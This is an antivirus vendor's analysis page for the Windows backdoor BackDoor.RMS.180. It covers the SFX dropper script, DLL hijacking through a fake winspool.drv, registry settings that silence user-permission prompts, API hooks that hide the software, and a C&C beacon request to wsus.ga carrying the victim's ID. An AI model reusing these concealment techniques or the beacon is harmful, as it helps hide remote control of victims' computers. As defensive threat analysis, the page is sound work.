Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

BackDoor.RMS.180

Добавлен в вирусную базу Dr.Web: 2020-11-02

Описание добавлено:

Packer: absent

Compilation date:

02.11.2020 00:26:28

SHA1 hash:

  • c3e619d796349f2f1efada17c9717cf42d4b77e2

Description

A backdoor trojan that operates in the 32-bit and 64-bit versions of Microsoft Windows operating systems. The backdoor is written using components from the Remote Utilities software. It spreads within a self-extracting archive (7192d71d5a57e057a76f7b1857ab7d0c9ca2bf11) via phishing emails. The backdoor is designed to remotely control the infected computer.

Operating routine

The self-extracting archive is launched by the following script:

;Розміщений нижче коментар містить команди SFX-скрипта
Path=%APPDATA%\Macromedia\Temp\
Setup=WinPrint.exe
Silent=1
Overwrite=2

Content of the self-extracting dropper:

  • libeay32.dll (f54a31a9211f4a7506fdecb5121e79e7cdc1022e), clean
  • ssleay32.dll (18ee67c1a9e7b9b82e69040f81b61db9155151ab), clean
  • UniPrint.exe (71262de7339ca2c50477f76fcb208f476711c802), signed with valid digital signature
  • WinPrint.exe (3c8d1dd39b7814fdc0792721050f953290be96f8), signed with valid digital signature
  • winspool.drv (c3e619d796349f2f1efada17c9717cf42d4b77e2) — the main malicious module loaded via DLL Hijacking. It conceals the operation of the Remote Utilities software.

UniPrint.exe digital signature:

.>sigcheck -a UniPrint.exe:
Verified:       Signed
Signing date:   16:46 02.07.2019
Publisher:      Remote Utilities LLC
Company:        Remote Utilities LLC
Description:    Remote Utilities - Host
Product:        Remote Utilities
Prod version:   6.10.10.0
File version:   6.10.10.0
MachineType:    32-bit
Binary Version: 6.10.10.0
Original Name:  n/a
Internal Name:  n/a
Copyright:      Copyright © 2019 Remote Utilities LLC. All rights reserved.
Comments:       n/a
Entropy:        6.359

WinPrint.exe digital signature:

.>sigcheck -a WinPrint.exe:
Verified:       Signed
Signing date:   14:59 29.06.2017
Publisher:      Ter-Osipov Aleksey Vladimirovich
Company:        n/a
Description:    Virtual Printer Properties Module
Product:        RMS Printer
Prod version:   1.0
File version:   1.0
MachineType:    32-bit
Binary Version: 1.0.0.0
Original Name:  n/a
Internal Name:  n/a
Copyright:      n/a
Comments:       n/a
Entropy:        6.169

Winspool.drv table of exported functions:

118  RemoveYourMom
119  AddFormW
144  ClosePrinter
148  OpenDick
156  DeleteFormW
189  DocumentPropertiesW
190  HyXyJIuHagoToA
195  EnumFormsW
203  GetDefaultPrinterW
248  EnumPrintersW
273  GetFormW
303  OpenPrinterW
307  PrinterProperties

Functions that are not present in the original winspool.drv module and do not carry a functional load:

#drweb BackDoor.RMS.180

Exported functions with actual names contain transitions to the original functions subsequently loaded from the legitimate library.

#drweb BackDoor.RMS.180

DllMain

Some API functions are executed through pointers to adapter functions:

#drweb BackDoor.RMS.180

#drweb BackDoor.RMS.180

The get_proc function searches for the necessary API function by parsing the module export table. It then inserts the located address instead of the adapter function.

At the first stage, it loads the spoofed library. The name is not hardcoded, so the <system_directory>\<module_filename> library is loaded. It then parses its export table and loads the original API functions by ordinals, skipping invalid functions:

RemoveYourMom
OpenDick
HyXyJIuHagoToA

#drweb BackDoor.RMS.180

The backdoor then checks the context within which executable it is running. To do this, it checks the IMAGE_NT_HEADERS.OptionalHeader.CheckSum value of the main executable module:

  • The value is equal to 0x2ECF3 — initial launch with WinPrint.exe
  • The value is equal to 0xC9FBD1 — operating in the context of UniPrint.exe

If WinPrint.exe is running, the backdoor creates the UniPrint.exe process and ends the operation.

UniPrint.exe

When UniPrint.exe is running, the backdoor proceeds to perform the main functions. It checks whether the user has administrator access rights. Then it sets access rights to the directory with the module:

#drweb BackDoor.RMS.180

It then writes the General and Security parameters to the HKCU\SOFTWARE\WDMPrint registry key.

Value of the Security parameter:

<?xml version="1.0" ?>
<general_settings version="69110">
    <port>5650</port>
    <hide_tray_icon_popup_menu>true</hide_tray_icon_popup_menu>
    <tray_menu_hide_stop>true</tray_menu_hide_stop>
    <language>English</language>
    <callback_auto_connect>true</callback_auto_connect>
    <callback_connect_interval>60</callback_connect_interval>
    <protect_callback_settings>false</protect_callback_settings>
    <protect_inet_id_settings>false</protect_inet_id_settings>
    <use_legacy_capture>false</use_legacy_capture>
    <do_not_capture_rdp>true</do_not_capture_rdp>
    <use_ip_v_6>false</use_ip_v_6>
    <log_use>false</log_use>
    <notify_show_panel>false</notify_show_panel>
    <notify_change_tray_icon>false</notify_change_tray_icon>
    <notify_ballon_hint>false</notify_ballon_hint>
    <notify_play_sound>false</notify_play_sound>
    <notify_panel_x>-1</notify_panel_x>
    <notify_panel_y>-1</notify_panel_y>
    <disable_internet_id>false</disable_internet_id>
    <safe_mode_set>false</safe_mode_set>
    <show_id_notification>false</show_id_notification>
    <show_id_notification_request>true</show_id_notification_request>
    <integrate_firewall_at_startup>true</integrate_firewall_at_startup>
</general_settings>

Value of the Security parameter:

<?xml version="1.0" ?>
<security_settings version="69110">
    <single_password_hash>EEACE8FF203A9678664A51DA07E0ED76641C1F06570B2793A452CD521A1ABD8E6938A54AF36861B5AF21CA3EC485B0D19DFC6827862EB7ECA017DE035F9B5F15</single_password_hash>
    <ip_filter_type>2</ip_filter_type>
    <auth_kind>1</auth_kind>
    <otp_enable>false</otp_enable>
    <user_permissions_ask>false</user_permissions_ask>
    <user_permissions_interval>10000</user_permissions_interval>
    <user_permissions_allow_default>false</user_permissions_allow_default>
    <user_permissions_only_if_user_logged_on>false</user_permissions_only_if_user_logged_on>
    <disable_remote_control>false</disable_remote_control>
    <disable_remote_screen>false</disable_remote_screen>
    <disable_file_transfer>false</disable_file_transfer>
    <disable_redirect>false</disable_redirect>
    <disable_telnet>false</disable_telnet>
    <disable_remote_execute>false</disable_remote_execute>
    <disable_task_manager>false</disable_task_manager>
    <disable_shutdown>false</disable_shutdown>
    <disable_remote_upgrade>true</disable_remote_upgrade>
    <disable_preview_capture>false</disable_preview_capture>
    <disable_device_manager>false</disable_device_manager>
    <disable_chat>true</disable_chat>
    <disable_screen_record>false</disable_screen_record>
    <disable_av_capture>false</disable_av_capture>
    <disable_send_message>true</disable_send_message>
    <disable_registry>false</disable_registry>
    <disable_av_chat>false</disable_av_chat>
    <disable_remote_settings>false</disable_remote_settings>
    <disable_remote_printing>false</disable_remote_printing>
    <disable_rdp>false</disable_rdp>
</security_settings>

It then prepares the value of the InternetID parameter using a format string:

<?xml version="1.0" ?&gt
<rms_internet_id_settings version="69110"&gt
    <use_inet_connection&gttrue&lt;/use_inet_connection&gt
    <use_custom_inet_server&gt%s</use_custom_inet_server&gt
    <inet_server&gt%s</inet_server&gt
    <inet_id_port&gt%s</inet_id_port&gt
    <use_inet_id_ipv6&gtfalse&lt;/use_inet_id_ipv6&gt
    <inet_id_use_pin&gtfalse&lt;/inet_id_use_pin&gt
</rms_internet_id_settings&gt

In this sample, the <use_custom_inet_server> value is set to false, and <inet_server> and <inet_id_port> are left empty:

#drweb BackDoor.RMS.180

The backdoor then creates the MDICLIENT and RMSHDNLT hidden windows:

#drweb BackDoor.RMS.180

After that, it begins intercepting API functions. To do so, it uses the MinHook library:

#drweb BackDoor.RMS.180

The list of intercepted functions is shown in the table:

Module name API name Functionality
kernel32.dll CreateToolhelp32Snapshot Always returns the 0xFFFFFFFF value.
OutputDebugStringW Functionality is absent
GetFileAttributesW

The function returns the FILE_ATTRIBUTE_NORMAL value for the rutserv.exe and rfusclient.exe files. It returns the INVALID_FILE_ATTRIBUTES for the English.lg file.

In all other cases, it calls the original API function.

CreateFileW

If the pipe name (\\.\PIPE\) containing one of the following strings — RMan, RMS, Buh, or {52E6 — is requested, the function adds the HDLT string to the name and passes it to the original function.

If the name contains rutserv.exe and the working directory, it replaces this name with the name of the executable module and passes it to the original function.

In all other cases, it calls the original API function.

GetTempPathW Returns the working directory.
CreateNamedPipeW

If the pipe name (\\.\PIPE\) containing one of the following strings — RMan, RMS, Buh, or {52E6 — is requested, the function adds the HDLT string to the name and passes it to the original function.

If there are no required substrings, it calls the original function.

FindFirstFileW

If the lpFileName argument contains rutserv.exe or *, the function checks the UniPrint.exe file in the working directory and returns the WIN32_FIND_DATAW structure with the rutserv file name in working directory.

If *.lg or *.dll files are requested, it returns the INVALID_HANDLE_VALUE error code. In all other cases, it calls the original API function.

CreateDirectoryW

If the directory name being created contains Remote Utilities Agent or rutserv.madExcept, it returns 0 (ERROR_SUCCESS).

In all other cases, it calls the original API function.

GetModuleFileNameW

If the hModule argument is 0x400000 (ImageBase of the executable module), the function returns the name \"rutserv.exe".

In all other cases, it calls the original API function.

CreateProcessW

If the application name or command line contains rfusclient.exe, it returns 1 (success).

In all other cases, it calls the original API function.

GetCommandLineW Calls the original function, adds -second to the result, and then returns the resulting string.
CreateEventW

If the event name is Global\\RMSServer, the function adds the HDLT string, and then calls the original function.

#drweb BackDoor.RMS.180

Other values may also be added; in this sample they are zero.

wintrust.dll WinVerifyTrust Always returns zero, so the requested object is trusted.
shell32.dll SHGetSpecialFolderLocation If the csidl argument is equal to CSIDL_APPDATA, the function returns zero (failure); otherwise, it calls the original function.
Shell_NotifyIconW Always returns 1 (success).
advapi32.dll RegCreateKeyExW

If the system\Remote Utilities key is requested, it returns ERROR_ACCESS_DENIED.

If the SOFTWARE\Usoris or SOFTWARE\Remote Utilities keys are requested, it replaces the key value with SOFTWARE\WDMPrint (where the connection parameters were previously written) and changes the section to HKCU.

In all other cases, it calls the original API function.

RegOpenKeyExW Similar to the RegCreateKeyExW function, but in cases of the SYSTEM\Remote Utilities request, it returns the ERROR_FILE_NOT_FOUND error code.
RegSetValueExW If the lpValueName argument is equal to the FUSClientPath, General or CalendarRecordSettings values, it returns zero (S_OK). For the remaining values, it calls the original function.
CreateProcessAsUserW Similar to the CreateProcessW function.
OpenServiceW If lpServiceName is equal to RManService, the function returns zero (failure). For other values, it calls the original function.
CreateServiceW Similar to the CreateProcessW function.
user32.dll MessageBoxA(W)

One hook for both versions of the function (ASCII, Wide).

If a window with the MB_YESNO or MB_YESNOCANCEL types is requested, it returns IDYES.

CreateWindowExW This hook initializes the C&C server connection (see below).
wtsapi32.dll WTSSendMessageW Similar to the MessageBox function, if the Style parameter matches the MB_YESNO or MB_YESNOCANCEL values, the function returns IDYES; otherwise, it returns IDOK.
ws2_32.dll bind

If the port in the sockaddr structure is equal to the 5655 value stored in the bind_port global variable, the function replaces the IP address with localhost. There is an option for IPv4 and IPv6.

In all other cases, it calls the original API function.

htons

If the argument is not equal to 5650, it calls the original function.

If not, it creates a TCP socket and attempts to connect to localhost via the bind_port port. If it succeeds, it closes the socket, reduces the port value by one, and calls the original htons function for the resulting value, then returns the value.

If the bind_port value at the beginning of the function execution is already less than or equal to 80, the connection to localhost is skipped.

winmm.dll PlaySoundW Returns 1.

CreateWindowExW

When the CreateWindowExW function is intercepted, the class name of the creating window is checked. If it is equal to TMessageForm, the function returns zero. If a subsidiary window is created, (WS_CHILDWINDOW or WS_EX_CHILDWINDOW), the value of the parent window handle is replaced with the handle of the previously created window MDICLIENT. If the TEdit window is created, and contains the connection ID, the handle of this window is stored in a global variable. Next, Windows Sockets API (WSA) and SSL (SSLEAY32.dll library) are initialized. After that, the backdoor is registered in RunOnce under the Virtual Printer Driver name with the WinPrint.exe launch.

#drweb BackDoor.RMS.180

Following that, a thread is created to connect to the C&C server.

Connection to the C&C server

At the beginning, utilizing the TEdit window handle, the backdoor uses the GetWindowTextA function to get the InternetID required for remote connection. It then forms a GET request:

GET /command.php?t=2&id=<Internet-ID> HTTP/1.1
Host: wsus.ga
Accept-Charset: UTF-8
User-Agent: Mozilla/5.0 (Windows NT)
Connection: close

Next, it creates a TCP socket. After that, it checks the value of the global variable that stores the port for connection over the SSL protocol (in the sample it is zero). If the port is not zero, the connection is made over SSL, using the SSLEAY32.dll library functions. If the port is not specified, the backdoor is connected via port 80.

Then it sends the generated request. If a response is received, it waits 1 minute and then resends the request with Internet ID. If there is no response, it repeats the request after 2 seconds. The request transmission occurs in an infinite loop.

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке